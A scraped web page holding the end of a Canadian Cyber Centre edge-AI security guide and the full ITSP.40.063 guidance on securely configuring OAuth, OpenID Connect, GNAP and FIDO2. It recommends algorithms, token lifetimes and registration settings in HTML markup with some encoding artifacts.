<li>Examples: Autonomous tractors and farm machinery, drones for crop monitoring and pesticide application, as well as edge sensors for soil monitoring and livestock tracking</li> <li>Mapping example: An agricultural operator (Category 8) using <abbr title="artificial intelligence">AI</abbr>-guided autonomous drones for crop monitoring (Category HĀ ā Reinforcement learning and autonomy) will therefore prioritize secure supply chain verification of drone firmware, device hardening against physical tampering in remote environments, and defined human override procedures</li> </ul></li> <li><strong>Category 9Ā ā Defence and national security:</strong> <ul><li>Description: government defence, military and security organizations using edge <abbr title="artificial intelligence">AI</abbr> in the field</li> <li>Examples: tactical drones and surveillance robots, <abbr title="artificial intelligence">AI</abbr>-enabled communication equipment for troops, autonomous reconnaissance systems, and edge devices in secure military networks</li> <li>Mapping example: A defence organization (Category 9) deploying <abbr title="artificial intelligence">AI</abbr> for real-time tactical surveillance and autonomous decision support (Categories F and HĀ ā Deep learning and Reinforcement learning) will therefore prioritize cryptographic protection of on-device models, zero-trust identity management for autonomous agents, and anti-tamper controls on field-deployed devices</li> </ul></li> <li><strong>Category 10Ā ā Financial services (edge computing):</strong> <ul><li>Description: financial sector use of <abbr title="artificial intelligence">AI</abbr> at edge locations</li> <li>Examples: fraud detection algorithms running on automated teller machines or <abbr title="point of sale">POS</abbr> terminals, biometric authentication devices at bank branches, high-frequency trading systems at exchange edges, and edge analytics for real-time transaction processing</li> <li>Mapping example: A financial institution (Category 10) using <abbr title="artificial intelligence">AI</abbr> for real-time fraud detection at <abbr title="point of sale">POS</abbr> terminals (Category DĀ ā Classic <abbr title="machine learning">ML</abbr>) will therefore prioritize model integrity monitoring, secure update pipelines, and anomaly detection to identify when the fraud model’s behaviour has been manipulated</li> </ul></li> </ul><p>Identifying your organizationās category (or combination of categories) will help you tailor these guidelines to your specific context. For instance, a healthcare operator may prioritize data sovereignty and model monitoring for patient safety, whereas a defence organization would heavily emphasize model hardening and human oversight of autonomous systems. You can use these categories as a starting point to focus your efforts where they matter most.</p> </section></div> </div> </div> </div> </div> </article>
- Guidance on securely configuring authorization and authentication frameworks – ITSP.40.063by Canadian Centre for Cyber Security on July 13, 2026 at 6:57 pm
<article data-history-node-id="7899" about="/en/guidance/guidance-securely-configuring-authorization-authentication-frameworks-itsp40063" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>July 2026</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Practitioner series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSP.40.063</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>July 2026Ā |Ā Practitioner series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"><!– <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/ITSPxxxxx-e.pdf">Guidance on securely configuring authorization and authentication frameworks - ITSP.40.063 (PDF, xxx KB)</a></p> </div>–> <section><h2>Effective date</h2> <p>This publication takes effect on July 13, 2026.</p> </section><section><h2>Revision history</h2> <ol class="list-unstyled"><li><strong>First release:</strong> July 13, 2026.</li> </ol></section><section><h2>Overview</h2> <p>This publication identifies and describes authorization and authentication frameworks that organizations can implement to protect sensitive information. For Government of Canada (GC) departments and agencies, the guidance in this publication applies to UNCLASSIFIED, PROTECTED A, and PROTECTED B information. This guidance should be used in conjunction with <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic Algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B Information (ITSP.40.111)</a>. The configurations in this publication comply with the cryptographic requirements in ITSP.40.111.</p> <p>Your organization’s ability to securely process user authorization and authentication is fundamental to the delivery of your programs and services. Using cryptographic security frameworks ensures the confidentiality, integrity and availability of information and helps protect against certain cyber intrusion threats.</p> <p>Data confidentiality, integrity, and availability, stakeholder authentication and accountability, as well as non-repudiation are all benefits of properly configured authorization and authentication frameworks. You may need to use various frameworks to satisfy your organization’s specific security requirements. You should select and implement each framework to ensure all requirements are met.</p> <p>For more information on securely configuring authorization and authentication frameworks, contact the Cyber Centre.</p> <ul><li>Email: <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a></li> <li>Phone: <a href="tel:+16139497048">(613) 949-7048</a> or <a href="tel:+18332923788">1ā833āCYBERā88</a></li> </ul></section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of contents</h2> </summary><ul class="list-unstyled mrgn-tp-lg"><li><a href="#a1">1 Introduction</a> <ul><li><a href="#a11">1.1 <abbr title="information technology">IT</abbr> security risk management process</a></li> <li><a href="#a12">1.2 General recommendations</a></li> <li><a href="#a13">1.3 Post-quantum cryptography</a></li> </ul></li> <li><a href="#a2">2 OAuth and OpenID Connect</a> <ul><li><a href="#a21">2.1 OAuth and OpenID Connect clients</a></li> <li><a href="#a22">2.2 Digital signatures and encryption</a></li> <li><a href="#a23">2.3 Authorization</a></li> <li><a href="#a24">2.4 Tokens</a></li> <li><a href="#a25">2.5 OpenID Connect UserInfo endpoint</a></li> </ul></li> <li><a href="#a3">3 Grant Negotiation and Authorization Protocol</a> <ul><li><a href="#a31">3.1 Client instance key</a></li> <li><a href="#a32">3.2 Grant response</a></li> <li><a href="#a33">3.3 Interaction</a></li> </ul></li> <li><a href="#a4">4 Fast Identity Online 2</a> <ul><li><a href="#a41">4.1 Credential registration</a></li> <li><a href="#a42">4.2 Authentication</a></li> </ul></li> </ul></details></section><h2 id="a1">1 Introduction</h2> <p>Organizations rely on information technology (IT) systems to achieve business objectives. These interconnected systems can be the targets of serious cyber attacks and other threats that jeopardize the confidentiality, integrity and availability of information assets. Compromised networks, systems or information can have adverse effects on business activities and may result in data breaches and financial loss.</p> <p>This publication provides guidance on securely configuring authorization and authentication frameworks to protect sensitive information using cryptographic algorithms recommended by the Cyber Centre for the UNCLASSIFIED, PROTECTED A, and PROTECTED B levels. It complements the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=26262">Treasury Board of Canada Secretariat (TBS) Guideline on Defining Authentication Requirements</a>. Organizations are responsible for determining their security objectives and requirements as part of their risk management framework.</p> <h3 id="a11">1.1 <abbr title="information technology">IT</abbr> security risk management process</h3> <p>When implementing security protocols, practitioners should consider the <abbr title="information technology">IT</abbr> security risk management activities described in <a href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management: A lifecycle approach (ITSP.10.033)</a>. ITSP.10.033 addresses 2 levels of <abbr title="information technology">IT</abbr> security risk management activities: departmental-level and information system-level activities. It also includes a catalogue of security controls (for example, standardized security requirements to protect the confidentiality, integrity and availability of <abbr title="information technology">IT</abbr> assets).</p> <p>Additionally, organizations should consider the following activity areas:</p> <ul><li>define</li> <li>develop</li> <li>allocate</li> <li>monitor and assess</li> <li>maintain and update</li> </ul><p>Read Organizational cyber security and privacy risk management activities (ITSP.10.036) for more information on these activities.</p> <p>Departmental-level activities (or organizational-level activities for non-GC organizations) are included in departmental or organizational security programs to plan, manage, assess and improve the management of <abbr title="information technology">IT</abbr> security risks.</p> <p>Information system-level activities are included in an information system’s lifecycle through the information system security implementation process (ISSIP). When implementing network security protocols, you should consider all the steps in the <abbr title="information system security implementation process">ISSIP</abbr>. Read System lifecycle cyber security and privacy risk management activities (ITSP.10.037) for more details on information system security risk management.</p> <h3 id="a12">1.2 General recommendations</h3> <p>For each framework listed in this publication, the recommendations are best considered as a whole package. Choosing to follow some recommendations and not others may result in security vulnerabilities.</p> <p>When using a public key infrastructure (PKI) with any of these frameworks, you should follow the <abbr title="public key infrastructure">PKI</abbr> guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>.</p> <h3 id="a13">1.3 Post-quantum cryptography</h3> <p>Quantum computers threaten to break many of the public key cryptosystems that we currently use. In August 2024, the National Institute of Standards and Technology (NIST) published standards for post-quantum cryptography that are designed to be resistant to the advantages of future quantum computers. For additional information on these standards, read <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a>.</p> <p>Once the standards for the various authorization and authentication frameworks are revised to include post-quantum cryptography, we expect to update this publication to include recommendations for post-quantum configurations.</p> <p>In the meantime, the Cyber Centre recommends the following high-level steps:</p> <ul><li>Evaluate the sensitivity of your organization’s information and determine its lifespan to identify information that may be at risk (for example, as part of on-going risk assessment processes)</li> <li>Review your <abbr title="information technology">IT</abbr> lifecycle management plan and budget for potentially significant software and hardware updates</li> <li>Educate your workforce on the quantum threat</li> </ul><p>For more detailed information, read <a href="/en/guidance/preparing-your-organization-quantum-threat-cryptography-itsap00017">Preparing your organization for the quantum threat to cryptography (ITSAP.00.017)</a>.</p> <p>Organizations should wait until the standards for using post-quantum cryptography in frameworks are finalized before revising configurations to protect information or systems.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a2">2 OAuth and OpenID Connect</h2> <p>OAuth is an authorization protocol framework that leverages a third-party authorization server enabling an end user to authorize a client to access its resources. The OpenID Connect (OIDC) protocol can be used with OAuth to provide user authentication. The recommendations in this section apply to the use of both OAuth and <abbr title="OpenID Connect">OIDC</abbr>, except when noted otherwise.</p> <p>In <abbr title="OpenID Connect">OIDC</abbr>, an OAuth client is referred to as a relying party and an OAuth authorization server is referred to as an OpenID provider or identity provider.</p> <p>The Cyber Centre recommends the use of OAuth version 2.0, originally defined in the <a href="https://datatracker.ietf.org/doc/html/rfc6749">Internet Engineering Task Force (IETF) Request for Comments (RFC) 6749 The OAuth 2.0 Authorization Framework</a> and in updates from subsequent <abbr title="Requests for Comments">RFCs</abbr> according to guidance in this section.</p> <p>When using <abbr title="OpenID Connect">OIDC</abbr>, use the version as defined in <a href="https://openid.net/specs/openid-connect-core-1_0.html">OpenID Connect Core 1.0 incorporating errata set 2</a>.</p> <p>The Cyber Centre also recommends securing all OAuth and <abbr title="OpenID Connect">OIDC</abbr> communication with Transport Layer Security (TLS) configured according to the <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>.</p> <h3 id="a21">2.1 OAuth and OpenID Connect clients</h3> <p>OAuth defines 2 types of clients: public and confidential. The Cyber Centre recommends using the ‘confidential’ client type.</p> <p>When making requests to the OAuth authorization server, your organization should use 1 of the following methods for client authentication:</p> <ul><li>client_secret_jwt</li> <li>private_key_jwt</li> <li>tls_client_auth (when only using OAuth)</li> <li>self_signed_tls_client_auth (when only using OAuth)</li> </ul><p>When using either the "client_secret_jwt" or "private_key_jwt" authentication method, the authorization server’s issuer identifier should be used as the value for the "aud" claim.</p> <h4>2.1.1 Client registration and server discovery</h4> <p>To register OAuth and <abbr title="OpenID Connect">OIDC</abbr> clients, the Cyber Centre recommends using dynamic registration in accordance with the <a href="https://datatracker.ietf.org/doc/html/rfc7591"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 7591 OAuth 2.0 Dynamic Client Registration Protocol</a>, and with <a href="https://openid.net/specs/openid-connect-registration-1_0.html">OpenID Connect Dynamic Client Registration 1.0 incorporating errata set 2</a> when registering <abbr title="OpenID Connect">OIDC</abbr> clients. When these 2 specifications conflict, follow the guidance in <abbr title="Request for Comments">RFC</abbr> 7591.</p> <p>During registration, the Cyber Centre recommends registering the following optional information with the authorization server:</p> <ul><li>all redirection uniform resource identifiers (URIs) the client may use in the authorization request; all <abbr title="uniform resource identifiers">URIs</abbr> should be complete and use the ‘https’ scheme</li> <li>the client’s authentication method and associated signature algorithms that will be used at the authorization server’s endpoints</li> <li>the signature and encryption algorithms to be used by both parties throughout the protocol</li> </ul><p>Clients should register each redirection <abbr title="uniform resource identifier">URI</abbr> with only 1 authorization server.</p> <p>The Cyber Centre recommends using the "jwks_uri" client parameter. Clients incapable of hosting public uniform resource locators (URLs) should use the "jwks" parameter.</p> <p>In addition, the Cyber Centre recommends that authorization servers:</p> <ul><li>provide a way for clients to query and update the registration information</li> <li>assign unique client IDs to different instances of the same software</li> <li>assign unique client secrets to all registration requests, even those from the same software or software instance</li> <li>provide lists of supported signature and encryption algorithms for each type of data being signed or encrypted</li> <li>provide the location of the UserInfo endpoint (when using <abbr title="OpenID Connect">OIDC</abbr>)</li> </ul><p>When using <abbr title="OpenID Connect">OIDC</abbr>, use the <abbr title="OpenID Connect">OIDC</abbr> discovery protocol as specified in <a href="https://openid.net/specs/openid-connect-discovery-1_0.html">OpenID Connect Discovery 1.0 incorporating errata set 2</a>.</p> <h3 id="a22">2.2 Digital signatures and encryption</h3> <p>OAuth and <abbr title="OpenID Connect">OIDC</abbr> make extensive use of JavaScript Object Notation (JSON) Web Signatures (JWS) and <abbr title="JavaScript Object Notation">JSON</abbr> Web Encryptions (JWE).</p> <p>Where a <strong><abbr title="JSON Web Signature">JWS</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"alg" parameter</strong>:</p> <ul><li>PS256 (RSASSA-PSS using SHA-256 and MGF1 with SHA-256)</li> <li>PS384 (RSASSA-PSS using SHA-384 and MGF1 with SHA-384)</li> <li>PS512 (RSASSA-PSS using SHA-512 and MGF1 with SHA-512</li> <li>ES256 (ECDSA using P-256 and SHA-256)</li> <li>ES384 (ECDSA using P-384 and SHA-384)</li> <li>ES512 (ECDSA using P-521 and SHA-512)</li> <li>Ed25519 (EdDSA using Ed25519 curve)</li> <li>Ed448 (EdDSA using Ed448 curve)</li> </ul><p>If <strong>none of the above</strong> are available, it is sufficient to use 1 of the following:</p> <ul><li>RS256 (RSASSA-PKCS1-v1_5 using SHA-256)</li> <li>RS384 (RSASSA-PKCS1-v1_5 using SHA-384)</li> <li>RS512 (RSASSA-PKCS1-v1_5 using SHA-512)</li> </ul><p>If it is necessary to use the <strong>"client_secret_jwt" authentication method</strong>, 1 of the following algorithms may be used for the <strong><abbr title="JSON Web Signature">JWS</abbr> "alg" parameter</strong> when signing the client authentication <abbr title="JavaScript Object Notation">JSON</abbr> Web Token (JWT):</p> <ul><li>HS256 (HMAC using SHA-256)</li> <li>HS384 (HMAC using SHA-384)</li> <li>HS512 (HMAC using SHA-512)</li> </ul><p>Where a <strong><abbr title="JSON Web Encryptions">JWE</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"alg" parameter</strong>:</p> <ul><li>RSA-OAEP-256 (RSAES OAEP using SHA-256 and MGF1 with SHA-256)</li> <li>RSA-OAEP-384 (RSA-OAEP using SHA-384 and MGF1 with SHA-384)</li> <li>RSA-OAEP-512 (RSA-OAEP using SHA-512 and MGF1 with SHA-512)</li> <li>ECDH-ES (ECDH-ES using Concat KDF)</li> <li>ECDH-ES+A128KW (ECDH-ES using Concat KDF and "A128KW" wrapping)</li> <li>ECDH-ES+A192KW (ECDH-ES using Concat KDF and "A192KW" wrapping)</li> <li>ECDH-ES+A256KW (ECDH-ES using Concat KDF and "A256KW" wrapping)</li> </ul><p>Where a <strong><abbr title="JSON Web Encryptions">JWE</abbr> is used within OAuth or <abbr title="OpenID Connect">OIDC</abbr></strong>, the Cyber Centre recommends using 1 of the following for the <strong>"enc" parameter</strong>:</p> <ul><li>A128CBC-HS256 (AES_128_CBC_HMAC_SHA_256 authenticated encryption algorithm)</li> <li>A192CBC-HS384 (AES_192_CBC_HMAC_SHA_384 authenticated encryption algorithm)</li> <li>A256CBC-HS512 (AES_256_CBC_HMAC_SHA_512 authenticated encryption algorithm)</li> <li>A128GCM (AES GCM using 128-bit key)</li> <li>A192GCM (AES GCM using 192-bit key)</li> <li>A256GCM (AES GCM using 256-bit key)</li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="a23">2.3 Authorization</h3> <p>The Cyber Centre recommends using the authorization code grant for OAuth and the authorization code flow for <abbr title="OpenID Connect">OIDC</abbr>. When an OAuth client is requesting access to its own resources, the client credentials grant can be used instead.</p> <p>Authorization codes should have a maximum lifetime of 60 seconds.</p> <h4>2.3.1 Authorization requests and responses</h4> <p>The Cyber Centre recommends using the "state" and "redirect_uri" parameters in authorization requests, and authorization servers should perform exact string matching of the "redirect_uri" against the <abbr title="uniform resource identifiers">URIs</abbr> provided at registration. You should also use the "nonce" parameter when you use <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>The Cyber Centre recommends using 1 of the following response modes:</p> <ul><li>form_post</li> <li>jwt (encrypted)</li> <li>jwt (encrypted)</li> <li>jwt (either encrypted or unencrypted)</li> </ul><p>When using OAuth, you should use rich authorization requests, as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9396"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9396 OAuth 2.0 Rich Authorization Requests</a> and the Proof Key for Code Exchange (PKCE) extension defined in <a href="https://datatracker.ietf.org/doc/html/rfc7636"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 7636 Proof Key for Code Exchange by OAuth Public Clients</a> with "S256" as the code challenge method. Use of PKCE with <abbr title="OpenID Connect">OIDC</abbr> is optional.</p> <p>At least 1 of the "state", "nonce", and "code_challenge" parameters should be cryptographically bound to the user agent.</p> <p>Authorization responses should contain the issuer identifier claim "iss" as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9207"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9207 OAuth 2.0 Authorization Server Issue Identification</a> or be encoded as defined in <a href="https://openid.net/specs/oauth-v2-jarm.html"><abbr title="JSON Web Token">JWT</abbr> Secured Authorization Response Mode for OAuth 2.0 (JARM)</a>.</p> <h4>2.3.2 Pushed authorization requests</h4> <p>The Cyber Centre recommends the use of pushed authorization requests, as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9126"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9126 OAuth 2.0 Pushed Authorization Requests</a>. Any <abbr title="uniform resource identifiers">URIs</abbr> generated by the authorization server for use with pushed authorization requests should have a maximum lifetime of 60 seconds and be single use. Clients should not be allowed to use unregistered redirect <abbr title="uniform resource identifiers">URIs</abbr>.</p> <h4>2.3.3 <abbr title="JSON Web Token">JWT</abbr>-secured authorization request</h4> <p>The <abbr title="JSON Web Token">JWT</abbr>-secured authorization request (JAR), as defined in <a href="https://datatracker.ietf.org/doc/html/rfc9101"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9101 The OAuth 2.0 Authorization Framework: <abbr title="JSON Web Token">JWT</abbr>-Secured Authorization Request (JAR)</a>, may optionally be used. When <abbr title="JWT-Secured Authorization Request">JAR</abbr> is used, the Cyber Centre recommends using the "request" parameter to send the request object to the authorization server. Request objects should be signed and the keys used should not be used for signing other <abbr title="JSON Web Tokens">JWTs</abbr>. The request object may optionally be encrypted after signing. Additionally, request objects should be single-use and contain a unique "state" parameter. For <abbr title="OpenID Connect">OIDC</abbr>, the request object should contain a unique "nonce" parameter. Authorization servers should verify the source of a request by verifying the <abbr title="JSON Web Signature">JWS</abbr>.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h3 id="a24">2.4 Tokens</h3> <h4>2.4.1 Token exchange</h4> <p>The Token Exchange allows a client to obtain access and ID tokens. The client should include the redirection <abbr title="uniform resource identifier">URI</abbr> value in the token request and ensure that the value is the same as in the corresponding authorization request.</p> <p>The authorization server should verify that an authorization code is only redeemed once. If there is an attempt to use it again, the authorization server should revoke all tokens issued for the authorization code.</p> <h4>2.4.2 Access tokens</h4> <p>Access tokens authorize a client to access a resource server on behalf of a user. The Cyber Centre recommends that implementations format access tokens as <abbr title="JSON Web Tokens">JWTs</abbr> that are signed and optionally encrypted.</p> <p>Access tokens should:</p> <ul><li>have a maximum lifetime of 3,600 seconds</li> <li>be passed in the HTTP header</li> <li>be associated to a single resource server</li> </ul><p>When using OAuth, the authorization details object should be included as a claim in the token.</p> <p>The Cyber Centre recommends the use of sender-constrained resource access tokens using 1 of the following methods:</p> <ul><li>mutual <abbr title="Transport Layer Security">TLS</abbr> as described in <a href="https://datatracker.ietf.org/doc/html/rfc8705"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 8705 OAuth 2.0 Mutual-<abbr title="Transport Layer Security">TLS</abbr> Client Authentication and Certificate-Bound Access Tokens</a></li> <li>demonstration of proof of possession as described in <a href="https://datatracker.ietf.org/doc/html/rfc9449"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9449 OAuth 2.0 Demonstrating Proof of Possession (DPoP)</a></li> </ul><p>When mutual <abbr title="Transport Layer Security">TLS</abbr> is used, you should:</p> <ul><li>follow the <abbr title="Transport Layer Security">TLS</abbr> configuration guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a></li> <li>bind access tokens to the client certificate</li> <li>ensure that any hash functions used in a confirmation method are compliant with <a href="/en/guidance/cryptographic-algorithms-unclassified-protected-protected-b-information-itsp40111">Cryptographic algorithms for UNCLASSIFIED, PROTECTED A, and PROTECTED B information (ITSP.40.111)</a></li> </ul><p>When demonstrating proof of possession (DPoP) is used, you should use a server-provided "<abbr title="demonstrating proof of possession">DPoP</abbr> nonce" and bind the authorization code to the <abbr title="demonstrating proof of possession">DPoP</abbr> key.</p> <h4>2.4.3 OpenID Connect ID tokens</h4> <p>This subsection only applies to <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>An ID token contains claims asserting that the user has been authenticated. When an ID token and access token are issued together, the "at_hash" claim should be included in the ID token.</p> <p>The Cyber Centre recommends that all ID tokens be signed and that ID tokens returned from an authorization endpoint be encrypted. ID tokens returned from a token endpoint may optionally be encrypted.</p> <h4>2.4.4 Refresh tokens</h4> <p>A refresh token permits a client to obtain a new access or ID token without reauthenticating the user. The Cyber Centre recommends formatting refresh tokens as signed <abbr title="JSON Web Tokens">JWTs</abbr> which may optionally be encrypted.</p> <p>In addition, refresh tokens should be:</p> <ul><li>revokable and have an expiration time</li> <li>sender-constrained or one-time use</li> <li>used with refresh token rotation</li> </ul><p>When using <abbr title="OpenID Connect">OIDC</abbr>, if an ID token is being returned in a refresh response, this token should not contain the nonce that was in the original ID token.</p> <h3 id="a25">2.5 OpenID Connect UserInfo endpoint</h3> <p>This subsection only applies to <abbr title="OpenID Connect">OIDC</abbr>.</p> <p>A UserInfo endpoint permits clients to retrieve claims about an authenticated user. UserInfo requests should use the HTTP "GET" method and send access tokens using the "authorization" header field.</p> <p>The Cyber Centre also recommends that the UserInfo response be signed. The UserInfo response may optionally be encrypted after signing.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a3">3 Grant Negotiation and Authorization Protocol</h2> <p>The Grant Negotiation and Authorization Protocol (GNAP) is specified in <a href="https://datatracker.ietf.org/doc/html/rfc9635/"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9635 Grant Negotiation and Authorization Protocol (GNAP)</a> and <a href="https://datatracker.ietf.org/doc/html/rfc9767/"><abbr title="Internet Engineering Task Force">IETF</abbr> <abbr title="Request for Comments">RFC</abbr> 9767 Grant Negotiation and Authorization Protocol Resource Server Connections</a>. It defines a mechanism for a client software instance to make a request to an authorization server for delegated access to a user’s resources on a resource server and/or subject information.</p> <h3 id="a31">3.1 Client instance key</h3> <p>The client instance key is bound to the access token for a particular client instance and can be used by authorization servers to identify such an instance. Clients interacting with multiple authorization servers should use a different key for each server they interact with.</p> <p>Clients should use 1 of the following key formats:</p> <ul><li>jwk</li> <li>cert</li> <li>cert#S256</li> </ul><p>When using the jwk format, use 1 of the following algorithms for the "alg" parameter:</p> <ul><li>RSA-OAEP-256 (RSAES OAEP using SHA-256 and MGF1 with SHA-256)</li> <li>RSA-OAEP-384 (RSA-OAEP using SHA-384 and MGF1 with SHA-384)</li> <li>RSA-OAEP-512 (RSA-OAEP using SHA-512 and MGF1 with SHA-512)</li> <li>ECDH-ES (ECDH-ES using Concat KDF)</li> <li>ECDH-ES+A128KW (ECDH-ES using Concat KDF and "A128KW" wrapping)</li> <li>ECDH-ES+A192KW (ECDH-ES using Concat KDF and "A192KW" wrapping)</li> <li>ECDH-ES+A256KW (ECDH-ES using Concat KDF and "A256KW" wrapping)</li> <li>A128KW (AES Key Wrap using 128-bit key)</li> <li>A192KW (AES Key Wrap using 192-bit key)</li> <li>A256KW (AES Key Wrap using 256-bit key)</li> <li>A128GCMKW (Key wrapping with AES GCM using 128-bit key)</li> <li>A192GCMKW (Key wrapping with AES GCM using 192-bit key)</li> <li>A256GCMKW (Key wrapping with AES GCM using 256-bit key)</li> </ul><p>The Cyber Centre further recommends using of 1 of the following proof formats, which are defined in <abbr title="Request for Comments">RFC</abbr> 9635:</p> <ul><li>httpsig</li> <li>mtls</li> <li>jwsd</li> <li>jws</li> </ul><h3 id="a32">3.2 Grant response</h3> <p>Upon receiving a client instance request, the authorization server sends a grant response. In the grant response, 1 of the following token formats, defined in <abbr title="Request for Comments">RFC</abbr> 9767, should be used:</p> <ul><li>jwt-signed</li> <li>jwt-encrypted</li> </ul><p>Bearer tokens should not be used as access tokens outside trusted internal systems. All access tokens should be bound to a key. ID tokens should use the "id_token" assertion format, which is defined in <abbr title="Request for Comments">RFC</abbr> 9635.</p> <h3 id="a33">3.3 Interaction</h3> <p>The Cyber Centre recommends using the following:</p> <ul><li>the "redirect" interaction start mode</li> <li>the "redirect" interaction finish method</li> <li>1 of the following hash methods for the interaction finish hash method: <ul><li>sha-256</li> <li>sha-384</li> <li>sha-512</li> <li>sha3-256</li> <li>sha3-384</li> <li>sha3-512</li> </ul></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a>Ā <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <h2 id="a4">4 Fast Identity Online 2</h2> <p>Fast Identity Online 2 (FIDO2) is a framework consisting of 2 protocols: <a href="https://www.w3.org/TR/webauthn-2/">Web Authentication</a> (WebAuthn) and the <a href="https://fidoalliance.org/specs/fido-v2.2-ps-20250714/fido-client-to-authenticator-protocol-v2.2-ps-20250714.html">Client-to-Authenticator Protocol</a> (CTAP). When used together, they allow a server, known as the relying party, to authenticate an end user using public key cryptography-based passkeys rather than traditional passwords.</p> <p>The Cyber Centre recommends securing all communication between the relying party’s server and application with <abbr title="Transport Layer Security">TLS</abbr> configured according to the guidance in <a href="/en/guidance/guidance-securely-configuring-network-protocols-itsp40062">Guidance on securely configuring network protocols (ITSP.40.062)</a>. Client-side applications should verify the authenticity of the server before performing any actions on behalf of the server.</p> <p>Relying parties should use a WebAuthn application programming interface (API) provided by a web browser or operating system to perform FIDO2 operations.</p> <h3 id="a41">4.1 Credential registration</h3> <p>In the "PublicKeyCredentialCreationOptions" object:</p> <ul><li>the "attestation" option should be set to "direct"</li> <li>the "authenticatorSelection" option should have the following parameters: <ul><li>"residentKey" set to "required"</li> <li>"requireResidentKey" set to "true"</li> <li>"userVerification" set to "required"</li> </ul></li> <li>the "pubKeyCredParams" option should use 1 of the following for the "alg" parameter: <ul><li>ES256 (ECDSA w/ SHA-256)</li> <li>ES384 (ECDSA w/ SHA-384)</li> <li>ES512 (ECDSA w/ SHA-512)</li> <li>Ed25519 (EdDSA using Ed25519 curve)</li> <li>Ed448 (EdDSA using Ed448 curve)</li> <li>PS256 (RSASSA-PSS using SHA-256 and MGF1 with SHA-256)</li> <li>PS384 (RSASSA-PSS using SHA-384 and MGF1 with SHA-384)</li> <li>PS512 (RSASSA-PSS using SHA-512 and MGF1 with SHA-512</li> </ul></li> <li>if none of the above "alg" parameter values are available, it is sufficient to use 1 of the following: <ul><li>RS256 (RSASSA-PKCS1-v1_5 using SHA-256)</li> <li>RS384 (RSASSA-PKCS1-v1_5 using SHA-384)</li> <li>RS512 (RSASSA-PKCS1-v1_5 using SHA-512)</li> </ul></li> </ul><p>Relying parties should support the credential protection extension with the parameter "enforceCredentialProtectionPolicy" set to "true" and "credentialProtectionPolicy" set to "userVerificationRequired’.</p> <p>Attestation should be required in the response to the credential creation request. In addition, the relying party should only accept an attestation that chains to a root certificate from a trusted source.</p> <h3 id="a42">4.2 Authentication</h3> <p>The Cyber Centre recommends setting the "userVerification" option to "required" in the "PublicKeyCredentialRequestOptions" object.</p> <p>The authentication should fail if the signature count received in an authentication response is less than or equal to the signature count that the relying party currently associates with the credential.</p> <div 